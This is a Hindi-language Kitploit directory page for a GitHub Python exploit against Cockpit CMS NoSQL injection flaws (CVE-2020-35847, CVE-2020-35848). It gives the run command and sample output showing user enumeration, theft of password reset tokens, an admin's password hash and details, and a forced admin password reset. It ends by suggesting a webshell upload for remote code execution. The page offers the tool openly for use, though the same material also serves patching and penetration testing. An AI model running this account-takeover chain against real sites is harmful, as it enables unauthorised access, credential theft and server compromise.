Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-35847_CVE-2020-35848 — CVE-2020-35847, CVE-2020-35848: खाता अधिग्रहण | Kitploit
उपकरण/GitHubGitHub/w33vils/cve-2020-35847_cve-2020-35848
टोहीपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करना
GitHubw33vils/cve-2020-35847_cve-2020-35848

CVE-2020-35847_CVE-2020-35848

CVE-2020-35847, CVE-2020-35848: खाता अधिग्रहण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
213 साल पहलेअभी तक समीक्षित नहीं

Cockpit CMS NoSQL इंजेक्शन (CVE-2020-35847, CVE-2020-35848)

Cockpit CMS संस्करण 0.11.2 से पहले /auth/resetpassword और /auth/newpassword में NoSQL इंजेक्शन भेद्यता के प्रति संवेदनशील है, जो पासवर्ड रीसेट टोकन निकालने की अनुमति देता है, जिससे उपयोगकर्ता विवरणों की गणना के साथ-साथ पासवर्ड रीसेट भी संभव होता है।

और पढ़ें - https://swarm.ptsecurity.com/rce-cockpit-cms/

यह पायथन स्क्रिप्ट सिस्टम पर उपयोगकर्ताओं की गणना करती है और पासवर्ड रीसेट करती है।

उपयोग

root@kitploit:~
python3 exploit.py -u http://cockpit-site-url

स्क्रिप्ट पहले सिस्टम पर उपयोगकर्ताओं की गणना करती है।

root@kitploit:~
[+] http://cockpit-site-url: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) : 

[+] Users Found : ['admin', 'user1', 'user2', 'user3']

फिर आप चुन सकते हैं कि किस उपयोगकर्ता के बारे में अधिक जानकारी एकत्र करनी है। यह उस उपयोगकर्ता के लिए रीसेट टोकन भी उत्पन्न करता है, जो पासवर्ड रीसेट में एक महत्वपूर्ण आवश्यकता है।

root@kitploit:~
[-] Get user details For : admin
[+] Finding Password reset tokens
         Tokens Found : ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] Obtaining user information 
-----------------Details--------------------
         [*] user : admin
         [*] name : Admin
         [*] email : [email protected]
         [*] active : True
         [*] group : admin
         [*] password : $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
         [*] i18n : en
         [*] _created : 1621655201
         [*] _modified : 1621655201
         [*] _id : 60a87ea165343539ee000300
         [*] _reset_token : rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
         [*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------

अंत में आप उपयोगकर्ता का पासवर्ड रीसेट करना चुन सकते हैं।

root@kitploit:~
[+] Do you want to reset the passowrd for admin? (Y/n): y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is: 
         Username : admin 
         Password : new_random_password

फिर आप RCE प्राप्त करने के लिए /finder घटक पर एक वेबशेल अपलोड करना चुन सकते हैं।

टूल डाउनलोड करें